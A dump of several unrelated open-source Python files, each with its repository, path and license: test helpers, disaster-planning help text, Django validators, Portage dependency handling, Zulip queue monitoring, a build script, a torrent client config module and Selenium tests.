msg = ('nbins: %s, desired_auc: %s, score_range: %s, '
'num_records: %s, frac_true: %s, num_updates: %s') % (nbins,
desired_auc,
score_range,
num_records,
frac_true,
num_updates)
np.testing.assert_allclose(desired_auc, auc_eval, atol=atol, err_msg=msg)
def synthetic_data(desired_auc, score_range, num_records, rng, frac_true):
"""Create synthetic boolean_labels and scores with adjustable auc.
Args:
desired_auc: Number in [0, 1], the theoretical AUC of resultant data.
score_range: 2-tuple, (low, high), giving the range of the resultant scores
num_records: Positive integer. The number of records to return.
rng: Initialized np.random.RandomState random number generator
frac_true: Number in (0, 1). Expected fraction of resultant labels that
will be True. This is just in expectation...more or less may actually be
True.
Returns:
boolean_labels: np.array, dtype=bool.
scores: np.array, dtype=np.float32
"""
# We prove here why the method (below) for computing AUC works. Of course we
# also checked this against sklearn.metrics.roc_auc_curve.
#
# First do this for score_range = [0, 1], then rescale.
# WLOG assume AUC >= 0.5, otherwise we will solve for AUC >= 0.5 then swap
# the labels.
# So for AUC in [0, 1] we create False and True labels
# and corresponding scores drawn from:
# F ~ U[0, 1], T ~ U[x, 1]
# We have,
# AUC
# = P[T > F]
# = P[T > F | F < x] P[F < x] + P[T > F | F > x] P[F > x]
# = (1 * x) + (0.5 * (1 - x)).
# Inverting, we have:
# x = 2 * AUC - 1, when AUC >= 0.5.
assert 0 <= desired_auc <= 1
assert 0 < frac_true < 1
if desired_auc < 0.5:
flip_labels = True
desired_auc = 1 - desired_auc
frac_true = 1 - frac_true
else:
flip_labels = False
x = 2 * desired_auc - 1
labels = rng.binomial(1, frac_true, size=num_records).astype(bool)
num_true = labels.sum()
num_false = num_records - labels.sum()
# Draw F ~ U[0, 1], and T ~ U[x, 1]
false_scores = rng.rand(num_false)
true_scores = x + rng.rand(num_true) * (1 - x)
# Reshape [0, 1] to score_range.
def reshape(scores):
return score_range[0] + scores * (score_range[1] - score_range[0])
false_scores = reshape(false_scores)
true_scores = reshape(true_scores)
# Place into one array corresponding with the labels.
scores = np.nan * np.ones(num_records, dtype=np.float32)
scores[labels] = true_scores
scores[~labels] = false_scores
if flip_labels:
labels = ~labels
return labels, scores
if __name__ == '__main__':
test.main()
| apache-2.0 |
dynaryu/inasafe | safe/gui/tools/help/needs_manager_help.py | 2 | 10496 | # coding=utf-8
"""Context help for minimum needs manager dialog."""
from safe.utilities.i18n import tr
from safe import messaging as m
from safe.messaging import styles
INFO_STYLE = styles.INFO_STYLE
__author__ = 'ismailsunni'
def needs_manager_helps():
"""Help message for Batch Dialog.
.. versionadded:: 3.2.1
:returns: A message object containing helpful information.
:rtype: messaging.message.Message
"""
message = m.Message()
message.add(m.Brand())
message.add(heading())
message.add(content())
return message
def heading():
"""Helper method that returns just the header.
This method was added so that the text could be reused in the
other contexts.
.. versionadded:: 3.2.2
:returns: A heading object.
:rtype: safe.messaging.heading.Heading
"""
message = m.Heading(tr('Minimum needs manager help'), **INFO_STYLE)
return message
def content():
"""Helper method that returns just the content.
This method was added so that the text could be reused in the
dock_help module.
.. versionadded:: 3.2.2
:returns: A message object without brand element.
:rtype: safe.messaging.message.Message
"""
message = m.Message()
message.add(m.Paragraph(tr(
'During and after a disaster, providing for the basic human minimum '
'needs of food, water, hygiene and shelter is an important element of '
'your contingency plan. InaSAFE has a customisable minimum needs '
'system that allows you to define country or region specific '
'requirements for compiling a needs report where the exposure '
'layer represents population.'
)))
message.add(m.Paragraph(tr(
'By default InaSAFE uses minimum needs defined for Indonesia - '
'and ships with additional profiles for the Philippines and Tanzania. '
'You can customise these or add your own region-specific profiles too.'
)))
message.add(m.Paragraph(tr(
'Minimum needs are grouped into regional or linguistic \'profiles\'. '
'The default profile is \'BNPB_en\' - the english profile for the '
'national disaster agency in Indonesia.'
'You will see that this profile defines requirements for displaced '
'persons in terms of Rice, Drinking Water, Clean Water (for bathing '
'etc.), Family Kits (with personal hygiene items) and provision of '
'toilets.'
)))
message.add(m.Paragraph(tr(
'Each item in the profile can be customised or removed. For example '
'selecting the first item in the list and then clicking on the '
'\'pencil\' icon will show the details of how it was defined.'
'If you scroll up and down in the panel you will see that for each '
'item, you can set a name, description, units (in singular, '
'plural and abbreviated forms), specify maxima and minima for the '
'quantity of item allowed, a default and a frequency. You would use '
'the maxima and minima to ensure that disaster managers never '
'allocate amounts that will not be sufficient for human livelihood, '
'and also that will not overtax the logistics operation for those '
'providing humanitarian relief.'
)))
message.add(m.Paragraph(tr(
'The final item in the item configuration is the \'readable sentence\''
'which bears special discussion. Using a simple system of tokens you '
'can construct a sentence that will be used in the generated needs '
'report.'
)))
message.add(m.Heading(tr('Minimum needs profiles'), **INFO_STYLE))
message.add(m.Paragraph(tr(
'A profile is a collection of resources that define the minimum needs '
'for a particular country or region. Typically a profile should be '
'based on a regional, national or international standard. The '
'actual definition of which resources are needed in a given '
'profile is dependent on the local conditions and customs for the '
'area where the contingency plan is being devised.'
)))
message.add(m.Paragraph(tr(
'For example in the middle east, rice is a staple food whereas in '
'South Africa, maize meal is a staple food and thus the contingency '
'planning should take these localised needs into account.'
)))
message.add(m.Heading(tr('Minimum needs resources'), **INFO_STYLE))
message.add(m.Paragraph(tr(
'Each item in a minimum needs profile is a resource. Each resource '
'is described as a simple natural language sentence e.g.:'
)))
message.add(m.EmphasizedText(tr(
'Each person should be provided with 2.8 kilograms of Rice weekly.'
)))
message.add(m.Paragraph(tr(
'By clicking on a resource entry in the profile window, and then '
'clicking the black pencil icon you will be able to edit the '
'resource using the resource editor. Alternatively you can create a '
'new resource for a profile by clicking on the black + icon in '
'the profile manager. You can also remove any resource from a '
'profile using the - icon in the profile manager.')))
message.add(m.Heading(tr('Resource Editor'), **INFO_STYLE))
message.add(m.Paragraph(tr(
'When switching to edit or add resource mode, the minimum needs '
'manager will be updated to show the resource editor. Each '
'resource is described in terms of:'
)))
bullets = m.BulletedList()
bullets.add(m.Text(
m.ImportantText(tr(
'resource name')),
tr(' - e.g. Rice')))
bullets.add(m.Text(
m.ImportantText(tr(
'a description of the resource')),
tr(' - e.g. Basic food')))
bullets.add(m.Text(
m.ImportantText(tr(
'unit in which the resource is provided')),
tr(' - e.g. kilogram')))
bullets.add(m.Text(
m.ImportantText(tr(
'pluralised form of the units')),
tr(' - e.g. kilograms')))
bullets.add(m.Text(
m.ImportantText(tr(
'abbreviation for the unit')),
tr(' - e.g. kg')))
bullets.add(m.Text(
m.ImportantText(tr(
'the default allocation for the resource')),
tr(' - e.g. 2.8. This number can be overridden on a '
'per-analysis basis')))
bullets.add(m.Text(
m.ImportantText(tr(
'minimum allowed which is used to prevent allocating')),
tr(' - e.g. no drinking water to displaced persons')))
bullets.add(m.ImportantText(tr(
'maximum allowed which is used to set a sensible upper '
'limit for the resource')))
bullets.add(m.ImportantText(tr(
'a readable sentence which is used to compile the '
'sentence describing the resource in reports.')))
message.add(bullets)
message.add(m.Paragraph(tr(
'These parameters are probably all fairly self explanatory, but '
'the readable sentence probably needs further detail. The '
'sentence is compiled using a simple keyword token replacement '
'system. The following tokens can be used:')))
bullets = m.BulletedList()
bullets.add(m.Text('{{ Default }}'))
bullets.add(m.Text('{{ Unit }}'))
bullets.add(m.Text('{{ Units }}'))
bullets.add(m.Text('{{ Unit abbreviation }}'))
bullets.add(m.Text('{{ Resource name }}'))
bullets.add(m.Text('{{ Frequency }}'))
bullets.add(m.Text('{{ Minimum allowed }}'))
bullets.add(m.Text('{{ Maximum allowed }}'))
message.add(bullets)
message.add(m.Paragraph(tr(
'When the token is placed in the sentence it will be replaced with '
'the actual value at report generation time. This contrived example '
'shows a tokenised sentence that includes all possible keywords:'
)))
message.add(m.EmphasizedText(tr(
'A displaced person should be provided with {{ %s }} '
'{{ %s }}/{{ %s }}/{{ %s }} of {{ %s }}. Though no less than {{ %s }} '
'and no more than {{ %s }}. This should be provided {{ %s }}.' % (
'Default',
'Unit',
'Units',
'Unit abbreviation',
'Resource name',
'Minimum allowed',
'Maximum allowed',
'Frequency'
)
)))
message.add(m.Paragraph(tr(
'Would generate a human readable sentence like this:')))
message.add(m.ImportantText(tr(
'A displaced person should be provided with 2.8 kilogram/kilograms/kg '
'of rice. Though no less than 0 and no more than 100. This should '
'be provided daily.'
)))
message.add(m.Paragraph(tr(
'Once you have populated the resource elements, click the Save '
'resource button to return to the profile view. You will see the '
'new resource added in the profile\'s resource list.'
)))
message.add(m.Heading(tr('Managing profiles'), **INFO_STYLE))
message.add(m.Paragraph(tr(
'When switching to edit or add resource mode, the minimum needs '
'manager will be updated to show the resource editor. Each '
'resource is described in terms of:'
)))
message.add(m.Paragraph(tr(
'In addition to the profiles that come as standard with InaSAFE, you '
'can create new ones, either from scratch, or based on an existing '
'one (which you can then modify).'
)))
message.add(m.Paragraph(tr(
'Use the New button to create new profile. When prompted, give your '
'profile a name e.g. \'JakartaProfile\'.'
)))
message.add(m.Paragraph(tr(
'Note: The profile must be saved in your home directory under '
'.qgis2/minimum_needs in order for InaSAFE to successfully detect it.'
)))
message.add(m.Paragraph(tr(
'An alternative way to create a new profile is to use the Save as to '
'clone an existing profile. The clone profile can then be edited '
'according to your specific needs.'
)))
message.add(m.Heading(tr('Active profile'), **INFO_STYLE))
message.add(m.Paragraph(tr(
'It is important to note, that which ever profile you select in the '
'Profile pick list, will be considered active and will be used as '
'the basis for all minimum needs analysis. You need to restart '
'QGIS before the changed profile become active.'
)))
return message
| gpl-3.0 |
yjxtogo/horizon | horizon/utils/validators.py | 32 | 2470 | # Copyright 2012 Nebula, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import re
from django.core.exceptions import ValidationError # noqa
from django.core import validators # noqa
from django.utils.translation import ugettext_lazy as _
from horizon import conf
def validate_port_range(port):
if port not in range(-1, 65536):
raise ValidationError(_("Not a valid port number"))
def validate_ip_protocol(ip_proto):
if ip_proto not in range(-1, 256):
raise ValidationError(_("Not a valid IP protocol number"))
def password_validator():
return conf.HORIZON_CONFIG["password_validator"]["regex"]
def password_validator_msg():
return conf.HORIZON_CONFIG["password_validator"]["help_text"]
def validate_port_or_colon_separated_port_range(port_range):
"""Accepts a port number or a single-colon separated range."""
if port_range.count(':') > 1:
raise ValidationError(_("One colon allowed in port range"))
ports = port_range.split(':')
for port in ports:
try:
if int(port) not in range(-1, 65536):
raise ValidationError(_("Not a valid port number"))
except ValueError:
raise ValidationError(_("Port number must be integer"))
def validate_metadata(value):
error_msg = _('Invalid metadata entry. Use comma-separated'
' key=value pairs')
if value:
specs = value.split(",")
for spec in specs:
keyval = spec.split("=")
# ensure both sides of "=" exist, but allow blank value
if not len(keyval) == 2 or not keyval[0]:
raise ValidationError(error_msg)
# Same as POSIX [:print:]. Accordingly, diacritics are disallowed.
PRINT_REGEX = re.compile(r'^[\x20-\x7E]*$')
validate_printable_ascii = validators.RegexValidator(
PRINT_REGEX,
_("The string may only contain ASCII printable characters."),
"invalid_characters")
| apache-2.0 |
mm1ke/portage | pym/_emerge/resolver/circular_dependency.py | 8 | 9294 | # Copyright 2010-2013 Gentoo Foundation
# Distributed under the terms of the GNU General Public License v2
from __future__ import print_function, unicode_literals
from itertools import chain, product
import logging
from portage.dep import use_reduce, extract_affecting_use, check_required_use, get_required_use_flags
from portage.exception import InvalidDependString
from portage.output import colorize
from portage.util import writemsg_level
from _emerge.DepPrioritySatisfiedRange import DepPrioritySatisfiedRange
from _emerge.Package import Package
class circular_dependency_handler(object):
MAX_AFFECTING_USE = 10
def __init__(self, depgraph, graph):
self.depgraph = depgraph
self.graph = graph
self.all_parent_atoms = depgraph._dynamic_config._parent_atoms
if "--debug" in depgraph._frozen_config.myopts:
# Show this debug output before doing the calculations
# that follow, so at least we have this debug info
# if we happen to hit a bug later.
writemsg_level("\n\ncircular dependency graph:\n\n",
level=logging.DEBUG, noiselevel=-1)
self.debug_print()
self.cycles, self.shortest_cycle = self._find_cycles()
#Guess if it is a large cluster of cycles. This usually requires
#a global USE change.
self.large_cycle_count = len(self.cycles) > 3
self.merge_list = self._prepare_reduced_merge_list()
#The digraph dump
self.circular_dep_message = self._prepare_circular_dep_message()
#Suggestions, in machine and human readable form
self.solutions, self.suggestions = self._find_suggestions()
def _find_cycles(self):
shortest_cycle = None
cycles = self.graph.get_cycles(ignore_priority=DepPrioritySatisfiedRange.ignore_medium_soft)
for cycle in cycles:
if not shortest_cycle or len(cycle) < len(shortest_cycle):
shortest_cycle = cycle
return cycles, shortest_cycle
def _prepare_reduced_merge_list(self):
"""
Create a merge to be displayed by depgraph.display().
This merge list contains only packages involved in
the circular deps.
"""
display_order = []
tempgraph = self.graph.copy()
while tempgraph:
nodes = tempgraph.leaf_nodes()
if not nodes:
node = tempgraph.order[0]
else:
node = nodes[0]
display_order.append(node)
tempgraph.remove(node)
return tuple(display_order)
def _prepare_circular_dep_message(self):
"""
Like digraph.debug_print(), but prints only the shortest cycle.
"""
if not self.shortest_cycle:
return None
msg = []
indent = ""
for pos, pkg in enumerate(self.shortest_cycle):
parent = self.shortest_cycle[pos-1]
priorities = self.graph.nodes[parent][0][pkg]
if pos > 0:
msg.append(indent + "%s (%s)" % (pkg, priorities[-1],))
else:
msg.append(indent + "%s depends on" % pkg)
indent += " "
pkg = self.shortest_cycle[0]
parent = self.shortest_cycle[-1]
priorities = self.graph.nodes[parent][0][pkg]
msg.append(indent + "%s (%s)" % (pkg, priorities[-1],))
return "\n".join(msg)
def _get_use_mask_and_force(self, pkg):
return pkg.use.mask, pkg.use.force
def _get_autounmask_changes(self, pkg):
needed_use_config_change = self.depgraph._dynamic_config._needed_use_config_changes.get(pkg)
if needed_use_config_change is None:
return frozenset()
use, changes = needed_use_config_change
return frozenset(changes.keys())
def _find_suggestions(self):
if not self.shortest_cycle:
return None, None
suggestions = []
final_solutions = {}
for pos, pkg in enumerate(self.shortest_cycle):
parent = self.shortest_cycle[pos-1]
priorities = self.graph.nodes[parent][0][pkg]
parent_atoms = self.all_parent_atoms.get(pkg)
if priorities[-1].buildtime:
dep = " ".join(parent._metadata[k]
for k in Package._buildtime_keys)
elif priorities[-1].runtime:
dep = parent._metadata["RDEPEND"]
for ppkg, atom in parent_atoms:
if ppkg == parent:
changed_parent = ppkg
parent_atom = atom.unevaluated_atom
break
try:
affecting_use = extract_affecting_use(dep, parent_atom,
eapi=parent.eapi)
except InvalidDependString:
if not parent.installed:
raise
affecting_use = set()
# Make sure we don't want to change a flag that is
# a) in use.mask or use.force
# b) changed by autounmask
usemask, useforce = self._get_use_mask_and_force(parent)
autounmask_changes = self._get_autounmask_changes(parent)
untouchable_flags = frozenset(chain(usemask, useforce, autounmask_changes))
affecting_use.difference_update(untouchable_flags)
#If any of the flags we're going to touch is in REQUIRED_USE, add all
#other flags in REQUIRED_USE to affecting_use, to not lose any solution.
required_use_flags = get_required_use_flags(
parent._metadata.get("REQUIRED_USE", ""),
eapi=parent.eapi)
if affecting_use.intersection(required_use_flags):
# TODO: Find out exactly which REQUIRED_USE flags are
# entangled with affecting_use. We have to limit the
# number of flags since the number of loops is
# exponentially related (see bug #374397).
total_flags = set()
total_flags.update(affecting_use, required_use_flags)
total_flags.difference_update(untouchable_flags)
if len(total_flags) <= self.MAX_AFFECTING_USE:
affecting_use = total_flags
affecting_use = tuple(affecting_use)
if not affecting_use:
continue
if len(affecting_use) > self.MAX_AFFECTING_USE:
# Limit the number of combinations explored (bug #555698).
# First, discard irrelevent flags that are not enabled.
# Since extract_affecting_use doesn't distinguish between
# positive and negative effects (flag? vs. !flag?), assume
# a positive relationship.
current_use = self.depgraph._pkg_use_enabled(parent)
affecting_use = tuple(flag for flag in affecting_use
if flag in current_use)
if len(affecting_use) > self.MAX_AFFECTING_USE:
# There are too many USE combinations to explore in
# a reasonable amount of time.
continue
#We iterate over all possible settings of these use flags and gather
#a set of possible changes
#TODO: Use the information encoded in REQUIRED_USE
solutions = set()
for use_state in product(("disabled", "enabled"),
repeat=len(affecting_use)):
current_use = set(self.depgraph._pkg_use_enabled(parent))
for flag, state in zip(affecting_use, use_state):
if state == "enabled":
current_use.add(flag)
else:
current_use.discard(flag)
try:
reduced_dep = use_reduce(dep,
uselist=current_use, flat=True)
except InvalidDependString:
if not parent.installed:
raise
reduced_dep = None
if reduced_dep is not None and \
parent_atom not in reduced_dep:
#We found an assignment that removes the atom from 'dep'.
#Make sure it doesn't conflict with REQUIRED_USE.
required_use = parent._metadata.get("REQUIRED_USE", "")
if check_required_use(required_use, current_use,
parent.iuse.is_valid_flag,
eapi=parent.eapi):
use = self.depgraph._pkg_use_enabled(parent)
solution = set()
for flag, state in zip(affecting_use, use_state):
if state == "enabled" and \
flag not in use:
solution.add((flag, True))
elif state == "disabled" and \
flag in use:
solution.add((flag, False))
solutions.add(frozenset(solution))
for solution in solutions:
ignore_solution = False
for other_solution in solutions:
if solution is other_solution:
continue
if solution.issuperset(other_solution):
ignore_solution = True
if ignore_solution:
continue
#Check if a USE change conflicts with use requirements of the parents.
#If a requiremnet is hard, ignore the suggestion.
#If the requirment is conditional, warn the user that other changes might be needed.
followup_change = False
parent_parent_atoms = self.depgraph._dynamic_config._parent_atoms.get(changed_parent)
for ppkg, atom in parent_parent_atoms:
atom = atom.unevaluated_atom
if not atom.use:
continue
for flag, state in solution:
if flag in atom.use.enabled or flag in atom.use.disabled:
ignore_solution = True
break
elif atom.use.conditional:
for flags in atom.use.conditional.values():
if flag in flags:
followup_change = True
break
if ignore_solution:
break
if ignore_solution:
continue
changes = []
for flag, state in solution:
if state:
changes.append(colorize("red", "+"+flag))
else:
changes.append(colorize("blue", "-"+flag))
msg = "- %s (Change USE: %s)\n" \
% (parent.cpv, " ".join(changes))
if followup_change:
msg += " (This change might require USE changes on parent packages.)"
suggestions.append(msg)
final_solutions.setdefault(pkg, set()).add(solution)
return final_solutions, suggestions
def debug_print(self):
"""
Create a copy of the digraph, prune all root nodes,
and call the debug_print() method.
"""
graph = self.graph.copy()
while True:
root_nodes = graph.root_nodes(
ignore_priority=DepPrioritySatisfiedRange.ignore_medium_soft)
if not root_nodes:
break
graph.difference_update(root_nodes)
graph.debug_print()
| gpl-2.0 |
kou/zulip | scripts/lib/check_rabbitmq_queue.py | 3 | 6873 | import json
import os
import re
import subprocess
import time
from collections import defaultdict
from typing import Any, DefaultDict, Dict, List
ZULIP_PATH = os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
normal_queues = [
'deferred_work',
'digest_emails',
'email_mirror',
'embed_links',
'embedded_bots',
'error_reports',
'invites',
'email_senders',
'missedmessage_emails',
'missedmessage_mobile_notifications',
'outgoing_webhooks',
'signups',
'user_activity',
'user_activity_interval',
'user_presence',
]
OK = 0
WARNING = 1
CRITICAL = 2
UNKNOWN = 3
states = {
0: "OK",
1: "WARNING",
2: "CRITICAL",
3: "UNKNOWN",
}
MAX_SECONDS_TO_CLEAR: DefaultDict[str, int] = defaultdict(
lambda: 30,
digest_emails=1200,
missedmessage_mobile_notifications=120,
embed_links=60,
)
CRITICAL_SECONDS_TO_CLEAR: DefaultDict[str, int] = defaultdict(
lambda: 60,
missedmessage_mobile_notifications=180,
digest_emails=1800,
embed_links=90,
)
def analyze_queue_stats(queue_name: str, stats: Dict[str, Any],
queue_count_rabbitmqctl: int) -> Dict[str, Any]:
now = int(time.time())
if stats == {}:
return dict(status=UNKNOWN,
name=queue_name,
message='invalid or no stats data')
if now - stats['update_time'] > 180 and queue_count_rabbitmqctl > 10:
# Queue isn't updating the stats file and has some events in
# the backlog, it's likely stuck.
#
# TODO: There's an unlikely race condition here - if the queue
# was fully emptied and was idle due to no new events coming
# for over 180 seconds, suddenly gets a burst of events and
# this code runs exactly in the very small time window between
# those events popping up and the queue beginning to process
# the first one (which will refresh the stats file at the very
# start), we'll incorrectly return the CRITICAL status. The
# chance of that happening should be negligible because the queue
# worker should wake up immediately and log statistics before
# starting to process the first event.
return dict(status=CRITICAL,
name=queue_name,
message='queue appears to be stuck, last update {}, queue size {}'.format(
stats['update_time'], queue_count_rabbitmqctl))
current_size = queue_count_rabbitmqctl
average_consume_time = stats['recent_average_consume_time']
if average_consume_time is None:
# Queue just started; we can't effectively estimate anything.
#
# If the queue is stuck in this state and not processing
# anything, eventually the `update_time` rule above will fire.
return dict(status=OK,
name=queue_name,
message='')
expected_time_to_clear_backlog = current_size * average_consume_time
if expected_time_to_clear_backlog > MAX_SECONDS_TO_CLEAR[queue_name]:
if expected_time_to_clear_backlog > CRITICAL_SECONDS_TO_CLEAR[queue_name]:
status = CRITICAL
else:
status = WARNING
return dict(status=status,
name=queue_name,
message=f'clearing the backlog will take too long: {expected_time_to_clear_backlog}s, size: {current_size}')
return dict(status=OK,
name=queue_name,
message='')
WARN_COUNT_THRESHOLD_DEFAULT = 10
CRITICAL_COUNT_THRESHOLD_DEFAULT = 50
def check_other_queues(queue_counts_dict: Dict[str, int]) -> List[Dict[str, Any]]:
""" Do a simple queue size check for queues whose workers don't publish stats files."""
results = []
for queue, count in queue_counts_dict.items():
if queue in normal_queues:
continue
if count > CRITICAL_COUNT_THRESHOLD_DEFAULT:
results.append(dict(status=CRITICAL, name=queue,
message=f'count critical: {count}'))
elif count > WARN_COUNT_THRESHOLD_DEFAULT:
results.append(dict(status=WARNING, name=queue,
message=f'count warning: {count}'))
else:
results.append(dict(status=OK, name=queue, message=''))
return results
def check_rabbitmq_queues() -> None:
pattern = re.compile(r'(\w+)\t(\d+)\t(\d+)')
if 'USER' in os.environ and not os.environ['USER'] in ['root', 'rabbitmq']:
print("This script must be run as the root or rabbitmq user")
list_queues_output = subprocess.check_output(['/usr/sbin/rabbitmqctl', 'list_queues',
'name', 'messages', 'consumers'],
universal_newlines=True)
queue_counts_rabbitmqctl = {}
queues_with_consumers = []
for line in list_queues_output.split("\n"):
line = line.strip()
m = pattern.match(line)
if m:
queue = m.group(1)
count = int(m.group(2))
consumers = int(m.group(3))
queue_counts_rabbitmqctl[queue] = count
if consumers > 0 and not queue.startswith("notify_tornado"):
queues_with_consumers.append(queue)
queue_stats_dir = subprocess.check_output([os.path.join(ZULIP_PATH, 'scripts/get-django-setting'),
'QUEUE_STATS_DIR'],
universal_newlines=True).strip()
queue_stats: Dict[str, Dict[str, Any]] = {}
queues_to_check = set(normal_queues).intersection(set(queues_with_consumers))
for queue in queues_to_check:
fn = queue + ".stats"
file_path = os.path.join(queue_stats_dir, fn)
if not os.path.exists(file_path):
queue_stats[queue] = {}
continue
with open(file_path) as f:
try:
queue_stats[queue] = json.load(f)
except json.decoder.JSONDecodeError:
queue_stats[queue] = {}
results = []
for queue_name, stats in queue_stats.items():
results.append(analyze_queue_stats(queue_name, stats, queue_counts_rabbitmqctl[queue_name]))
results.extend(check_other_queues(queue_counts_rabbitmqctl))
status = max(result['status'] for result in results)
now = int(time.time())
if status > 0:
queue_error_template = "queue {} problem: {}:{}"
error_message = '; '.join(
queue_error_template.format(result['name'], states[result['status']], result['message'])
for result in results if result['status'] > 0
)
print(f"{now}|{status}|{states[status]}|{error_message}")
else:
print(f"{now}|{status}|{states[status]}|queues normal")
| apache-2.0 |
iansf/engine | build/find_isolated_tests.py | 142 | 2261 | #!/usr/bin/env python
# Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Scans build output directory for .isolated files, calculates their SHA1
hashes, stores final list in JSON document and then removes *.isolated files
found (to ensure no stale *.isolated stay around on the next build).
Used to figure out what tests were build in isolated mode to trigger these
tests to run on swarming.
For more info see:
https://sites.google.com/a/chromium.org/dev/developers/testing/isolated-testing
"""
import glob
import hashlib
import json
import optparse
import os
import re
import sys
def hash_file(filepath):
"""Calculates the hash of a file without reading it all in memory at once."""
digest = hashlib.sha1()
with open(filepath, 'rb') as f:
while True:
chunk = f.read(1024*1024)
if not chunk:
break
digest.update(chunk)
return digest.hexdigest()
def main():
parser = optparse.OptionParser(
usage='%prog --build-dir <path> --output-json <path>',
description=sys.modules[__name__].__doc__)
parser.add_option(
'--build-dir',
help='Path to a directory to search for *.isolated files.')
parser.add_option(
'--output-json',
help='File to dump JSON results into.')
options, _ = parser.parse_args()
if not options.build_dir:
parser.error('--build-dir option is required')
if not options.output_json:
parser.error('--output-json option is required')
result = {}
# Get the file hash values and output the pair.
pattern = os.path.join(options.build_dir, '*.isolated')
for filepath in sorted(glob.glob(pattern)):
test_name = os.path.splitext(os.path.basename(filepath))[0]
if re.match(r'^.+?\.\d$', test_name):
# It's a split .isolated file, e.g. foo.0.isolated. Ignore these.
continue
# TODO(csharp): Remove deletion once the isolate tracked dependencies are
# inputs for the isolated files.
sha1_hash = hash_file(filepath)
os.remove(filepath)
result[test_name] = sha1_hash
with open(options.output_json, 'wb') as f:
json.dump(result, f)
return 0
if __name__ == '__main__':
sys.exit(main())
| bsd-3-clause |
kryptxy/torrench | torrench/utilities/Config.py | 1 | 4151 | """ Config module."""
import logging
import os
from configparser import SafeConfigParser
from torrench.utilities.Common import Common
class Config(Common):
r"""
Config class.
This class checks for config file's presence.
Also, this class manages TPB/KAT proxies; That is,
obtains TPB/KAT URL and fetches proxies thorugh those URL.
Proxies are stored as list and returned.
By default, Config files is checked in $XDG_CONFIG_HOME/torrench/ and
fallback to $HOME/.config/torrench/ directory (linux)
For windows, default location is ~\.config\torrench
This class inherits Common class.
"""
def __init__(self):
"""Initialisations."""
Common.__init__(self)
self.config = SafeConfigParser()
self.config_dir = os.getenv('XDG_CONFIG_HOME', os.path.expanduser(os.path.join('~', '.config')))
self.full_config_dir = os.path.join(self.config_dir, 'torrench')
self.config_file_name = "config.ini"
self.config_file_name_new = "config.ini.new"
self.config_file = os.path.join(self.full_config_dir, self.config_file_name)
self.config_file_new = os.path.join(self.full_config_dir, self.config_file_name_new)
self.url = None
self.name = None
self.urllist = []
self.logger = logging.getLogger('log1')
def file_exists(self):
"""To check whether config.ini file exists and is enabled or not."""
if os.path.isfile(self.config_file):
self.config.read(self.config_file)
enable = self.config.get('Torrench-Config', 'enable')
if enable == '1':
self.logger.debug("Config file exists and enabled!")
return True
def update_file(self):
try:
# Get updated copy of config.ini file.
self.logger.debug("Downloading new config.ini file")
url = "https://pastebin.com/raw/reymRHSL"
self.logger.debug("Download complete. Saving file..")
soup = self.http_request(url)
res = soup.p.get_text()
with open(self.config_file, 'w', encoding="utf-8") as f:
f.write(res)
self.logger.debug("Saved new file as {}".format(self.config_file))
# Read file and set enable = 1
self.config.read(self.config_file)
self.logger.debug("Now enabling file")
self.config.set('Torrench-Config', 'enable', '1')
# Write changes to config.ini file (self.config_file)
with open(self.config_file, 'w', encoding="utf-8") as configfile:
self.config.write(configfile)
self.logger.debug("File enabled successfull and saved.")
print("Config file updated!")
self.logger.debug("Config file updated successfully.")
except Exception as e:
print("Something went wrong. See logs for details.")
self.logger.debug("Something gone wrong while updating config file.")
self.logger.exception(e)
# To get proxies for KAT/TPB/...
def get_proxies(self, name):
"""
Get Proxies.
Proxies are read from config.ini file.
"""
self.logger.debug("getting proxies for '%s'" % (name))
temp = []
self.config.read(self.config_file)
name = '{}_URL'.format(name.upper())
self.url = self.config.get('Torrench-Config', name)
self.urllist = self.url.split()
if name == 'TPB_URL':
soup = self.http_request(self.urllist[-1])
link = soup.find_all('td', class_='site')
del self.urllist[-1]
for i in link:
temp.append(i.a["href"])
self.urllist.extend(temp)
elif name == "1337X_URL":
soup = self.http_request(self.urllist[-1])
link = soup.findAll('td', class_='text-left')
del self.urllist[-1]
for i in link:
temp.append(i.a["href"])
self.urllist.extend(temp)
self.logger.debug("got %d proxies!" % (len(self.urllist)))
return self.urllist
| gpl-3.0 |
joshuaduffy/selenium | py/test/selenium/webdriver/common/children_finding_tests.py | 3 | 10379 | # Licensed to the Software Freedom Conservancy (SFC) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The SFC licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import unittest
from selenium.common.exceptions import NoSuchElementException
from selenium.common.exceptions import InvalidSelectorException
from selenium.webdriver.common.by import By
class ChildrenFindingTests(unittest.TestCase):
def test_should_find_element_by_xpath(self):
self._load_page("nestedElements")
element = self.driver.find_element_by_name("form2")
child = element.find_element_by_xpath("select")
self.assertEqual(child.get_attribute("id"), "2")
def test_should_not_find_element_by_xpath(self):
self._load_page("nestedElements")
element = self.driver.find_element_by_name("form2")
try:
element.find_element_by_xpath("select/x")
self.fail("Expected NoSuchElementException to have been thrown")
except NoSuchElementException as e:
pass
def test_finding_dot_slash_elements_on_element_by_xpath_should_find_not_top_level_elements(self):
self._load_simple_page()
parent = self.driver.find_element_by_id("multiline")
children = parent.find_elements_by_xpath("./p")
self.assertEqual(1, len(children))
self.assertEqual("A div containing", children[0].text)
def test_should_find_elements_by_xpath(self):
self._load_page("nestedElements")
element = self.driver.find_element_by_name("form2")
children = element.find_elements_by_xpath("select/option")
self.assertEqual(len(children), 8);
self.assertEqual(children[0].text, "One")
self.assertEqual(children[1].text, "Two")
def test_should_not_find_elements_by_xpath(self):
self._load_page("nestedElements")
element = self.driver.find_element_by_name("form2")
children = element.find_elements_by_xpath("select/x")
self.assertEqual(len(children), 0)
